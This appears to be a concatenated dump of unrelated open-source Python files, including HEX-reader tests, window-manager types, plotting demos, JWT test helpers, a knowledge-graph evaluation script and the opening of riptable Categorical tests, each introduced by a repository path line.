# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import unittest
import stcgal.ihex
class IHEXTests(unittest.TestCase):
"""Tests for IHEX reader"""
def test_simple(self):
"""Test reading a basic, valid file"""
lines = [
b":0B00000068656C6C6F5F776F726C645A",
b":00000001FF"
]
bindata = stcgal.ihex.IHex.read(lines).extract_data()
self.assertEqual(bindata, b"hello_world")
def test_empty(self):
"""Test reading an empty file"""
lines = []
bindata = stcgal.ihex.IHex.read(lines).extract_data()
self.assertEqual(bindata, b"")
def test_invalid(self):
"""Test invalid encoded data"""
lines = [
":abc"
]
with self.assertRaises(ValueError):
stcgal.ihex.IHex.read(lines)
def test_roundtrip(self):
"""Test round-trip through encoder/decoder"""
bindata = b"12345678"
for mode in (8, 16, 32):
with self.subTest(mode):
hexer = stcgal.ihex.IHex()
hexer.set_mode(mode)
hexer.insert_data(0, bindata)
encoded = hexer.write().encode("ASCII").splitlines()
decoded = stcgal.ihex.IHex.read(encoded).extract_data()
self.assertEqual(decoded, bindata)
|
foundations_ui/cypress/fixtures/atlas_scheduler/project_name/with_job_config_project/main.py | DeepLearnI/atlas | 296 | 12687083 | <gh_stars>100-1000
import foundations
import sys
foundations.log_metric("Task", sys.argv[1])
|
python/herbstluftwm/types.py | ju-sh/herbstluftwm | 925 | 12687093 | <gh_stars>100-1000
import re
"""
Module containing types used in the communication with herbstluftwm;
primarily, types used in attributes.
"""
class Point:
"""
A point on the 2D plane
"""
def __init__(self, x=0, y=0):
self.x = x
self.y = y
def __add__(self, other):
return Point(self.x + other.x, self.y + other.y)
def __sub__(self, other):
return Point(self.x - other.x, self.y - other.y)
def __mul__(self, scalar):
"""multiply with a given scalar"""
return Point(self.x * scalar, self.y * scalar)
def __floordiv__(self, scalar):
"""divide by scalar factor, forcing to integer coordinates"""
return Point(self.x // scalar, self.y // scalar)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def __repr__(self) -> str:
return f'Point({self.x}, {self.y})'
class Rectangle:
"""
A rectangle on the screen, defined by its size and its distance to
the top left screen corner.
"""
def __init__(self, x=0, y=0, width=0, height=0):
self.x = x
self.y = y
self.width = width
self.height = height
def __str__(self):
return f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})'
def __repr__(self):
return f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})'
def __eq__(self, other):
return self.x == other.x \
and self.y == other.y \
and self.width == other.width \
and self.height == other.height
def to_user_str(self):
return "%dx%d%+d%+d" % (self.width, self.height, self.x, self.y)
@staticmethod
def from_user_str(string):
reg = '([0-9]+)x([0-9]+)([+-][0-9]+)([+-][0-9]+)'
m = re.match(reg, string)
if m is None:
raise Exception(f'"{string}" is not in format {reg}')
w = int(m.group(1))
h = int(m.group(2))
x = int(m.group(3))
y = int(m.group(4))
return Rectangle(x, y, w, h)
def adjusted(self, dx=0, dy=0, dw=0, dh=0):
"""return a new rectangle whose components
are adjusted by the provided deltas.
"""
return Rectangle(self.x + dx, self.y + dy, self.width + dw, self.height + dh)
def topleft(self) -> Point:
"""the top left corner of the rectangle"""
return Point(self.x, self.y)
def bottomright(self) -> Point:
"""the bottom right corner of the rectangle"""
return Point(self.x + self.width, self.y + self.height)
def center(self) -> Point:
"""the center of the rectangle, forced to integer coordinates"""
return self.topleft() + self.size() // 2
def size(self) -> Point:
"""width and height of the rectangle"""
return Point(self.width, self.height)
class HlwmType:
"""
Wrapper functions for converting between python types and types
in herbstluftwm.
"""
def __init__(self, name, from_user_str, to_user_str, is_instance):
# a hlwm type should define the following
self.name = name # type: str
# a callback for parsing
self.from_user_str = from_user_str # of type: str -> T
# a callback for printing
self.to_user_str = to_user_str # of type: T -> str
# a predicate whether a python variable has this type:
self.is_instance = is_instance # of type: Anything -> bool
@staticmethod
def by_name(type_name):
"""Given the full name of a hlwm type, return
the metadata
python type"""
for t in hlwm_types():
if t.name == type_name:
return t
return None
@staticmethod
def by_type_of_variable(python_variable):
"""Given a variable, detect its type
"""
for t in hlwm_types():
if t.is_instance(python_variable):
return t
return None
def hlwm_types():
"""
Return a list of HlwmType objects.
Unfortunately, the order matters for the is_instance() predicate: Here, the
first matching type in the list must be used. (This is because
`isinstance(True, int)` is true)
"""
types = [
HlwmType(name='bool',
from_user_str=bool_from_user_str,
to_user_str=lambda b: 'true' if b else 'false',
is_instance=lambda x: isinstance(x, bool)),
HlwmType(name='int',
from_user_str=int,
to_user_str=str,
is_instance=lambda x: isinstance(x, int)),
# there is no uint in python, so we just convert it to 'int'
HlwmType(name='uint',
from_user_str=int,
to_user_str=str,
is_instance=lambda x: False),
HlwmType(name='rectangle',
from_user_str=Rectangle.from_user_str,
to_user_str=Rectangle.to_user_str,
is_instance=lambda x: isinstance(x, Rectangle)),
HlwmType(name='string',
from_user_str=lambda x: x,
to_user_str=lambda x: x,
is_instance=lambda x: isinstance(x, str)),
]
return types
def bool_from_user_str(bool_string):
"""Parse a string description of a hlwm boolean to
a python boolean"""
if bool_string.lower() in ['true', 'on']:
return True
if bool_string.lower() in ['false', 'off']:
return False
raise Exception(f'"{bool_string}" is not a boolean')
|
extraPackages/matplotlib-3.0.3/examples/mplot3d/3d_bars.py | dolboBobo/python3_ios | 130 | 12687101 | <filename>extraPackages/matplotlib-3.0.3/examples/mplot3d/3d_bars.py<gh_stars>100-1000
"""
=====================
Demo of 3D bar charts
=====================
A basic demo of how to plot 3D bars with and without
shading.
"""
import numpy as np
import matplotlib.pyplot as plt
# This import registers the 3D projection, but is otherwise unused.
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
# setup the figure and axes
fig = plt.figure(figsize=(8, 3))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122, projection='3d')
# fake data
_x = np.arange(4)
_y = np.arange(5)
_xx, _yy = np.meshgrid(_x, _y)
x, y = _xx.ravel(), _yy.ravel()
top = x + y
bottom = np.zeros_like(top)
width = depth = 1
ax1.bar3d(x, y, bottom, width, depth, top, shade=True)
ax1.set_title('Shaded')
ax2.bar3d(x, y, bottom, width, depth, top, shade=False)
ax2.set_title('Not Shaded')
plt.show()
|
pymol/pymol_example_plugin.py | whitmans-max/python-examples | 140 | 12687129 | #!/usr/bin/env python2
# plugin can't have `-` in filename
# `pymol-example-plugin.py` will not work
# `pymol_example_plugin.py` will work
import Tkinter as tk
import tkMessageBox
import pymol
class ExamplePlugin:
def __init__(self, parent):
self.parent = parent
# window
win = tk.Toplevel(self.parent)
win.title('Example Plugin')
# label
b = tk.Label(win, text='Select option')
b.pack()
# checkbuttons
self.var = tk.IntVar()
self.cb = tk.Checkbutton(win, text='OFF', indicatoron=0, variable=self.var, command=self.toggle)
self.cb.pack()
# button
b = tk.Button(win, text='Close', command=win.destroy)
b.pack()
def toggle(self):
if self.var.get():
text = 'selected'
# change text on checkbutton
self.cb['text'] = 'ON'
else:
text = 'unselected'
# change text on checkbutton
self.cb['text'] = 'OFF'
tkMessageBox.showinfo('Selection status', text)
def show():
# it can work without `parent`
# but `parent` may give access to parent window
# (but I don't know if it is usefull)
parent = pymol.plugins.get_tk_root()
ExamplePlugin(parent)
def __init__(self):
# add to menu `Plugin`
self.menuBar.addmenuitem('Plugin', 'command', label='Example Plugin', command=show)
# create command 'ExamplePlugin' for `PyMOL>`
pymol.cmd.extend('ExamplePlugin', show)
# create shortcut which works in `Viewer`
pymol.cmd.set_key('CTRL-F', show)
# show plugin window at start (if you need it)
show()
|
maml/utils/_typing.py | anooptp/maml | 367 | 12687142 | """Define several typing for convenient use"""
from typing import Union, Callable, Optional, Any, List
import numpy as np
from pymatgen.core import Structure, Molecule
OptStrOrCallable = Optional[Union[str, Callable[..., Any]]]
StructureOrMolecule = Union[Structure, Molecule]
VectorLike = Union[List[float], np.ndarray]
|
tests/helpers.py | jleclanche/fastapi-cloudauth | 198 | 12687147 | <gh_stars>100-1000
import base64
import json
from dataclasses import dataclass
from typing import Any, Dict, Iterable, List, Tuple
import pytest
from fastapi import HTTPException
from fastapi.security import HTTPAuthorizationCredentials
from fastapi.testclient import TestClient
from pydantic.main import BaseModel
from requests.models import Response
from fastapi_cloudauth.base import ScopedAuth, UserInfoAuth
from fastapi_cloudauth.verification import JWKsVerifier
@dataclass
class Auths:
protect_auth: ScopedAuth
protect_auth_ne: ScopedAuth
ms_auth: UserInfoAuth
ms_auth_ne: UserInfoAuth
invalid_ms_auth: UserInfoAuth
invalid_ms_auth_ne: UserInfoAuth
valid_claim: BaseModel
invalid_claim: BaseModel
class BaseTestCloudAuth:
"""
Required
setup: initialize test case
teardown: del items for test
decode: check decoded token and assigned info
"""
ACCESS_TOKEN = ""
SCOPE_ACCESS_TOKEN = ""
ID_TOKEN = ""
TESTAUTH: Auths
def setup(self, scope: Iterable[str]) -> None:
... # pragma: no cover
def teardown(self) -> None:
... # pragma: no cover
def decode(self) -> None:
... # pragma: no cover
def assert_get_response(
client: TestClient, endpoint: str, token: str, status_code: int, detail: str = ""
) -> Response:
if token:
headers = {"authorization": f"Bearer {token}"}
else:
headers = {}
response = client.get(endpoint, headers=headers)
assert response.status_code == status_code, f"{response.json()}"
if detail:
assert response.json().get("detail", "") == detail
return response
def _assert_verifier(token, verifier: JWKsVerifier) -> HTTPException:
http_auth = HTTPAuthorizationCredentials(scheme="a", credentials=token)
with pytest.raises(HTTPException) as e:
verifier._verify_claims(http_auth)
return e.value
def _assert_verifier_no_error(token, verifier: JWKsVerifier) -> None:
http_auth = HTTPAuthorizationCredentials(scheme="a", credentials=token)
assert verifier._verify_claims(http_auth) is False
def decode_token(token: str) -> Tuple[Dict[str, Any], Dict[str, Any], List[str]]:
header, payload, *rest = token.split(".")
header += f"{'=' * (len(header) % 4)}"
payload += f"{'=' * (len(payload) % 4)}"
_header = json.loads(base64.b64decode(header).decode())
_payload = json.loads(base64.b64decode(payload).decode())
return _header, _payload, rest
|
CapsE/evalCapsE.py | MedyG/kg-reeval | 104 | 12687153 | import tensorflow as tf
from scipy.stats import rankdata
import numpy as np
import os
import time
import datetime
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from builddata_softplus import *
from capsuleNet import CapsE
# Parameters
# ==================================================
parser = ArgumentParser("CapsE", formatter_class=ArgumentDefaultsHelpFormatter, conflict_handler='resolve')
parser.add_argument("--data", default="./data/", help="Data sources.")
parser.add_argument("--run_folder", default="./", help="Data sources.")
parser.add_argument("--name", default="WN18RR", help="Name of the dataset.")
parser.add_argument("--embedding_dim", default=100, type=int,
help="Dimensionality of character embedding (default: 128)")
parser.add_argument("--filter_size", default=1, type=int, help="Comma-separated filter sizes (default: '3,4,5')")
parser.add_argument("--num_filters", default=400, type=int, help="Number of filters per filter size (default: 128)")
parser.add_argument("--learning_rate", default=0.00001, type=float, help="Learning rate")
parser.add_argument("--batch_size", default=128, type=int, help="Batch Size")
parser.add_argument("--neg_ratio", default=1.0, help="Number of negative triples generated by positive (default: 1.0)")
parser.add_argument("--useInitialization", default=True, type=bool, help="Using the pretrained embeddings")
parser.add_argument("--num_epochs", default=51, type=int, help="Number of training epochs")
parser.add_argument("--savedEpochs", default=10, type=int, help="")
parser.add_argument("--allow_soft_placement", default=True, type=bool, help="Allow device soft device placement")
parser.add_argument("--log_device_placement", default=False, type=bool, help="Log placement of ops on devices")
parser.add_argument("--model_name", default='wn18rr_400_4', help="")
parser.add_argument("--useConstantInit", action='store_true')
parser.add_argument('--iter_routing', default=1, type=int, help='number of iterations in routing algorithm')
parser.add_argument('--num_outputs_secondCaps', default=1, type=int, help='')
parser.add_argument('--vec_len_secondCaps', default=10, type=int, help='')
parser.add_argument("--model_index", default='30')
parser.add_argument("--num_splits", default=8, type=int)
parser.add_argument("--testIdx", default=1, type=int, help="From 0 to 7")
parser.add_argument("--decode", action='store_false')
args = parser.parse_args()
print(args)
# Load data
print("Loading data...")
train, valid, test, words_indexes, indexes_words, \
headTailSelector, entity2id, id2entity, relation2id, id2relation = build_data(path=args.data, name=args.name)
data_size = len(train)
train_batch = Batch_Loader(train, words_indexes, indexes_words, headTailSelector, \
entity2id, id2entity, relation2id, id2relation, batch_size=args.batch_size,
neg_ratio=args.neg_ratio)
entity_array = np.array(list(train_batch.indexes_ents.keys()))
initialization = []
if args.useInitialization == True:
print("Using pre-trained initialization.")
initialization = np.empty([len(words_indexes), args.embedding_dim]).astype(np.float32)
initEnt, initRel = init_norm_Vector(args.data + args.name + '/relation2vec' + str(args.embedding_dim) + '.init',
args.data + args.name + '/entity2vec' + str(args.embedding_dim) + '.init',
args.embedding_dim)
for _word in words_indexes:
if _word in relation2id:
index = relation2id[_word]
_ind = words_indexes[_word]
initialization[_ind] = initRel[index]
elif _word in entity2id:
index = entity2id[_word]
_ind = words_indexes[_word]
initialization[_ind] = initEnt[index]
else:
print('*****************Error********************!')
break
initialization = np.array(initialization, dtype=np.float32)
assert len(words_indexes) % (len(entity2id) + len(relation2id)) == 0
print("Loading data... finished!")
x_valid = np.array(list(valid.keys())).astype(np.int32)
y_valid = np.array(list(valid.values())).astype(np.float32)
len_valid = len(x_valid)
batch_valid = int(len_valid / (args.num_splits - 1))
x_test = np.array(list(test.keys())).astype(np.int32)
y_test = np.array(list(test.values())).astype(np.float32)
len_test = len(x_test)
batch_test = int(len_test / (args.num_splits - 1))
# uncomment when tuning hyper-parameters on the validation set
# x_test = x_valid
# y_test = y_valid
# len_test = len_valid
# batch_test = batch_valid
##########################################
if args.decode == False:
lstModelNames = list(args.model_name.split(","))
for _model_name in lstModelNames:
out_dir = os.path.abspath(os.path.join(args.run_folder, "runs_CapsE", _model_name))
print("Evaluating {}\n".format(out_dir))
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
lstModelIndexes = list(args.model_index.split(","))
for _model_index in lstModelIndexes:
_file = checkpoint_prefix + "-" + _model_index
lstHT = []
for _index in range(args.num_splits):
with open(_file + '.eval.' + str(_index) + '.txt') as f:
for _line in f:
if _line.strip() != '':
lstHT.append(list(map(float, _line.strip().split())))
lstHT = np.array(lstHT)
print(_file, 'mr, mrr, hits@1, hits@10 --> ', np.sum(lstHT, axis=0) / (2 * len_test))
print('------------------------------------')
else:
with tf.Graph().as_default():
tf.set_random_seed(1234)
session_conf = tf.ConfigProto(allow_soft_placement=args.allow_soft_placement,
log_device_placement=args.log_device_placement)
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
with sess.as_default():
global_step = tf.Variable(0, name="global_step", trainable=False)
capse = CapsE(sequence_length=x_valid.shape[1],
initialization=initialization,
embedding_size=args.embedding_dim,
filter_size=args.filter_size,
num_filters=args.num_filters,
vocab_size=len(words_indexes),
iter_routing=args.iter_routing,
batch_size=2 * args.batch_size,
num_outputs_secondCaps=args.num_outputs_secondCaps,
vec_len_secondCaps=args.vec_len_secondCaps,
useConstantInit=args.useConstantInit
)
# Output directory for models and summaries
lstModelNames = list(args.model_name.split(","))
for _model_name in lstModelNames:
out_dir = os.path.abspath(os.path.join(args.run_folder, "runs_CapsE", _model_name))
print("Evaluating {}\n".format(out_dir))
# Checkpoint directory. Tensorflow assumes this directory already exists so we need to create it
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
lstModelIndexes = list(args.model_index.split(","))
for _model_index in lstModelIndexes:
_file = checkpoint_prefix + "-" + _model_index
capse.saver.restore(sess, _file)
print("Loaded model", _file)
# Predict function to predict scores for test data
def predict(x_batch, y_batch, writer=None):
feed_dict = {
capse.input_x: x_batch,
capse.input_y: y_batch
}
scores = sess.run([capse.predictions], feed_dict)
return scores
def test_prediction(x_batch, y_batch, head_or_tail='head'):
hits10 = 0.0
mrr = 0.0
mr = 0.0
hits1 = 0.0
for i in range(len(x_batch)):
new_x_batch = np.tile(x_batch[i], (len(entity2id), 1))
new_y_batch = np.tile(y_batch[i], (len(entity2id), 1))
if head_or_tail == 'head':
new_x_batch[:, 0] = entity_array
else: # 'tail'
new_x_batch[:, 2] = entity_array
lstIdx = []
for tmpIdxTriple in range(len(new_x_batch)):
tmpTriple = (new_x_batch[tmpIdxTriple][0], new_x_batch[tmpIdxTriple][1],
new_x_batch[tmpIdxTriple][2])
if (tmpTriple in train) or (tmpTriple in valid) or (
tmpTriple in test): # also remove the valid test triple
lstIdx.append(tmpIdxTriple)
new_x_batch = np.delete(new_x_batch, lstIdx, axis=0)
new_y_batch = np.delete(new_y_batch, lstIdx, axis=0)
# thus, insert the valid test triple again, to the beginning of the array
new_x_batch = np.insert(new_x_batch, 0, x_batch[i], axis=0) # thus, the index of the valid test triple is equal to 0
new_y_batch = np.insert(new_y_batch, 0, y_batch[i], axis=0)
# for running with a batch size
while len(new_x_batch) % ((int(args.neg_ratio) + 1) * args.batch_size) != 0:
new_x_batch = np.append(new_x_batch, [x_batch[i]], axis=0)
new_y_batch = np.append(new_y_batch, [y_batch[i]], axis=0)
results = []
listIndexes = range(0, len(new_x_batch), (int(args.neg_ratio) + 1) * args.batch_size)
for tmpIndex in range(len(listIndexes) - 1):
results = np.append(results, predict(
new_x_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]],
new_y_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]]))
results = np.append(results, predict(new_x_batch[listIndexes[-1]:], new_y_batch[listIndexes[-1]:]))
results = np.reshape(results, -1)
results_with_id = rankdata(results, method='ordinal')
_filter = results_with_id[0]
mr += _filter
mrr += 1.0 / _filter
if _filter <= 10:
hits10 += 1
if _filter == 1:
hits1 += 1
return np.array([mr, mrr, hits1, hits10])
if args.testIdx < (args.num_splits - 1):
head_results = test_prediction(
x_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)],
y_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)],
head_or_tail='head')
tail_results = test_prediction(
x_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)],
y_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)],
head_or_tail='tail')
else:
head_results = test_prediction(x_test[batch_test * args.testIdx: len_test],
y_test[batch_test * args.testIdx: len_test],
head_or_tail='head')
tail_results = test_prediction(x_test[batch_test * args.testIdx: len_test],
y_test[batch_test * args.testIdx: len_test],
head_or_tail='tail')
wri = open(_file + '.eval.' + str(args.testIdx) + '.txt', 'w')
for _val in head_results:
wri.write(str(_val) + ' ')
wri.write('\n')
for _val in tail_results:
wri.write(str(_val) + ' ')
wri.write('\n')
wri.close()
|
seq2seq/test/pooling_encoder_test.py | soupstandstop/test | 6,053 | 12687158 | <reponame>soupstandstop/test
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test Cases for PoolingEncoder.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import tensorflow as tf
import numpy as np
from seq2seq.encoders import PoolingEncoder
class PoolingEncoderTest(tf.test.TestCase):
"""
Tests the PoolingEncoder class.
"""
def setUp(self):
super(PoolingEncoderTest, self).setUp()
self.batch_size = 4
self.sequence_length = 16
self.input_depth = 10
self.mode = tf.contrib.learn.ModeKeys.TRAIN
def _test_with_params(self, params):
"""Tests the encoder with a given parameter configuration"""
inputs = tf.random_normal(
[self.batch_size, self.sequence_length, self.input_depth])
example_length = tf.ones(
self.batch_size, dtype=tf.int32) * self.sequence_length
encode_fn = PoolingEncoder(params, self.mode)
encoder_output = encode_fn(inputs, example_length)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
encoder_output_ = sess.run(encoder_output)
np.testing.assert_array_equal(
encoder_output_.outputs.shape,
[self.batch_size, self.sequence_length, self.input_depth])
np.testing.assert_array_equal(
encoder_output_.attention_values.shape,
[self.batch_size, self.sequence_length, self.input_depth])
np.testing.assert_array_equal(encoder_output_.final_state.shape,
[self.batch_size, self.input_depth])
def test_encode_with_pos(self):
self._test_with_params({
"position_embeddings.enable": True,
"position_embeddings.num_positions": self.sequence_length
})
def test_encode_without_pos(self):
self._test_with_params({
"position_embeddings.enable": False,
"position_embeddings.num_positions": 0
})
if __name__ == "__main__":
tf.test.main() |
french_law/python/main.py | edwintorok/catala | 792 | 12687171 | <filename>french_law/python/main.py
#!python3
from datetime import date
from src.allocations_familiales import PriseEnCharge_Code, Collectivite_Code
from src.api import allocations_familiales, Enfant
from src.catala import LogEvent, LogEventCode, reset_log, retrieve_log
import timeit
import argparse
from typing import List, Any
from termcolor import colored
def call_allocations_familiales() -> float:
return allocations_familiales(
date_courante=date(2020, 4, 20),
enfants=[
Enfant(id=0, remuneration_mensuelle=0,
date_de_naissance=date(2003, 2, 2),
prise_en_charge=PriseEnCharge_Code.EffectiveEtPermanente,
a_deja_ouvert_droit_aux_allocations_familiales=True),
Enfant(id=1, remuneration_mensuelle=300,
date_de_naissance=date(2013, 9, 30),
prise_en_charge=PriseEnCharge_Code.GardeAlterneePartageAllocations,
a_deja_ouvert_droit_aux_allocations_familiales=True)
],
ressources_menage=30000,
residence=Collectivite_Code.Metropole,
personne_charge_effective_permanente_est_parent=True,
personne_charge_effective_permanente_remplit_titre_I=True,
)
def benchmark_iteration():
money_given = call_allocations_familiales()
assert (money_given == 99.37)
def run_with_log() -> List[LogEvent]:
money_given = call_allocations_familiales()
assert (money_given == 99.37)
log = retrieve_log()
reset_log()
return log
def print_value(v: Any) -> str:
if isinstance(v, list):
return "[" + ",".join([str(x) for x in v]) + "]"
else:
return str(v)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='French law library in Python')
parser.add_argument('action', metavar='ACTION', type=str, nargs=1,
help="'bench' or 'show_log'")
args = parser.parse_args()
action = args.action[0]
if action == "bench":
iterations = 10000
print("Iterating {} iterations of the family benefits computation. Total time (s):".format(
iterations))
print(timeit.timeit(benchmark_iteration, number=iterations))
elif action == "show_log":
log = run_with_log()
indentation = 0
for log_event in log:
if log_event.code == LogEventCode.BeginCall:
print("{}{} {}".format(
"".ljust(indentation), colored("Begin call:", "yellow"), colored(" >> ".join(log_event.payload), "magenta"))) # type: ignore
indentation += 2
elif log_event.code == LogEventCode.EndCall:
indentation -= 2
print("{}{} {}".format(
"".ljust(indentation), colored("End call:", "yellow"), colored(" >> ".join(log_event.payload), "magenta"))) # type: ignore
elif log_event.code == LogEventCode.VariableDefinition:
headings, value = log_event.payload # type: ignore
print("{}{} {} {} {}".format(
"".ljust(indentation), colored("Variable definition:", "blue"), colored(" >> ".join(headings), "magenta"), colored(":=", "blue"), colored(print_value(value), "green"))) # type: ignore
elif log_event.code == LogEventCode.DecisionTaken:
print("{}{} {}".format(
"".ljust(indentation), colored("Decision taken:", "green"), colored("{}".format(log_event.payload), "magenta"))) # type: ignore
else:
print("Action '{}' not recognized!".format(action))
exit(-1)
|
matchzoo/modules/dropout.py | ChrisRBXiong/MatchZoo-py | 468 | 12687208 | <gh_stars>100-1000
import torch.nn as nn
class RNNDropout(nn.Dropout):
"""Dropout for RNN."""
def forward(self, sequences_batch):
"""Masking whole hidden vector for tokens."""
# B: batch size
# L: sequence length
# D: hidden size
# sequence_batch: BxLxD
ones = sequences_batch.data.new_ones(sequences_batch.shape[0],
sequences_batch.shape[-1])
dropout_mask = nn.functional.dropout(ones, self.p, self.training,
inplace=False)
return dropout_mask.unsqueeze(1) * sequences_batch
|
caffe2/python/operator_test/lars_test.py | Hacky-DH/pytorch | 60,067 | 12687218 | <filename>caffe2/python/operator_test/lars_test.py
from caffe2.python import core
from hypothesis import given
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
class TestLars(hu.HypothesisTestCase):
@given(offset=st.floats(min_value=0, max_value=100),
lr_min=st.floats(min_value=1e-8, max_value=1e-6),
**hu.gcs)
def test_lars(self, offset, lr_min, dc, gc):
X = np.random.rand(6, 7, 8, 9).astype(np.float32)
dX = np.random.rand(6, 7, 8, 9).astype(np.float32)
wd = np.array([1e-4]).astype(np.float32)
trust = np.random.rand(1).astype(np.float32)
lr_max = np.random.rand(1).astype(np.float32)
def ref_lars(X, dX, wd, trust, lr_max):
rescale_factor = \
trust / (np.linalg.norm(dX) / np.linalg.norm(X) + wd + offset)
rescale_factor = np.minimum(rescale_factor, lr_max)
rescale_factor = np.maximum(rescale_factor, lr_min)
return [rescale_factor]
op = core.CreateOperator(
"Lars",
["X", "dX", "wd", "trust", "lr_max"],
["rescale_factor"],
offset=offset,
lr_min=lr_min,
)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[X, dX, wd, trust, lr_max],
reference=ref_lars
)
|
waliki/search/search_indexes.py | luzik/waliki | 324 | 12687231 | <reponame>luzik/waliki
from waliki.models import Page
from haystack import indexes
class PageIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
def get_model(self):
return Page
|
riptable/tests/test_categorical.py | rtosholdings/riptable | 307 | 12687233 | import pytest
import os
import pandas as pd
import riptable as rt
from enum import IntEnum
from numpy.testing import assert_array_equal
from riptable import *
from riptable import save_sds, load_sds
from riptable import FastArray, Categorical, CatZero
from riptable.rt_categorical import Categories
from riptable.rt_enum import (
INVALID_DICT,
)
from riptable.rt_enum import (
DisplayLength,
DisplayJustification,
DisplayColumnColors,
)
from riptable.rt_enum import CategoryMode, TypeRegister
from riptable.rt_numpy import isnan, isnotnan, arange, ones
from riptable.tests.test_utils import (
get_categorical_data_factory_method,
get_all_categorical_data,
)
from riptable.rt_sds import SDSMakeDirsOn
from riptable.tests.utils import LikertDecision
# change to true since we write into /tests directory
SDSMakeDirsOn()
three_unicode = np.array(["AAPL\u2080", "AMZN\u2082", "IBM\u2081"])
three_bytes = FastArray([b'a', b'b', b'c'])
three_ints = FastArray([1, 2, 3])
compare_func_names = ['__ne__', '__eq__', '__ge__', '__gt__', '__le__', '__lt__']
int_success = [
np.array([True, False, True]), # ne
np.array([False, True, False]), # eq
np.array([False, True, True]), # ge
np.array([False, False, True]), # gt
np.array([True, True, False]), # le
np.array([True, False, False]), # lt
]
same_success = [
np.array([False, False, False]), # ne
np.array([True, True, True]), # eq
np.array([True, True, True]), # ge
np.array([False, False, False]), # gt
np.array([True, True, True]), # le
np.array([False, False, False]), # lt
]
diff_success = [
np.array([True, False, True]), # ne
np.array([False, True, False]), # eq
np.array([False, True, False]), # ge
np.array([False, False, False]), # gt
np.array([True, True, True]), # le
np.array([True, False, True]), # lt
]
ShowCompareInfo = False
list_bytes = [b'b', b'b', b'a', b'd', b'c']
list_unicode = ['b', 'b', 'a', 'd', 'c']
list_true_unicode = [u'b\u2082', u'b\u2082', u'a\u2082', u'd\u2082', u'c\u2082']
decision_dict = dict(zip(LikertDecision.__members__.keys(), [int(v) for v in LikertDecision.__members__.values()],))
def array_equal(arr1, arr2):
subr = arr1 - arr2
sumr = sum(subr == 0)
result = sumr == len(arr1)
if not result:
print("array comparison failed", arr1, arr2)
return result
class TestCategorical:
def _notimpl(self):
pytest.skip("This test needs to be implemented.")
def test_constructor(self):
# from pandas categorical
# from single parameter
# from two parameters
# ndarray
# python list
self._notimpl()
def test_ctor_list(self):
c_bytes = Categorical(list_bytes)
assert c_bytes.dtype == np.int8, f"Dtype {c_bytes.dtype} was not correct for construction from small list."
assert len(c_bytes) == 5, f"Length of underlying index array was incorrect for construction from bytes."
unique_bytes = np.unique(list_bytes)
assert np.all(
c_bytes._categories_wrap._list == unique_bytes
), f"Categories did not generate a unique list of categories from input bytes list."
c_unicode = Categorical(list_unicode)
assert c_unicode.dtype == np.int8, f"Dtype {c_unicode.dtype} was not correct for construction from small list."
assert len(c_unicode) == 5, f"Length of underlying index array was incorrect for construction from unicode."
assert (
len(c_unicode._categories_wrap) == 4
), f"Length of unique categories was incorrect for construction from unicode."
assert (
c_unicode._categories_wrap._list[0] == b'a'
), f"Unique categories were not sorted for construction from unicode."
assert c_unicode._categories_wrap._list.dtype.char == 'S', f"Unicode strings were not flipped to byte strings."
c_true_unicode = Categorical(list_true_unicode)
assert (
c_true_unicode.dtype == np.int8
), f"Dtype {c_true_unicode.dtype} was not correct for construction from small list."
assert (
len(c_true_unicode) == 5
), f"Length of underlying index array was incorrect for construction from true unicode."
assert (
len(c_true_unicode._categories_wrap) == 4
), f"Length of unique categories was incorrect for construction from true unicode."
assert (
c_true_unicode._categories_wrap._list[0] == u'a\u2082'
), f"Unique categories were not sorted for construction from true unicode."
assert (
c_true_unicode._categories_wrap._list.dtype.char == 'U'
), f"Unicode strings were not flipped to byte strings."
def test_ctor_nparray(self):
c_bytes = Categorical(np.array(list_bytes))
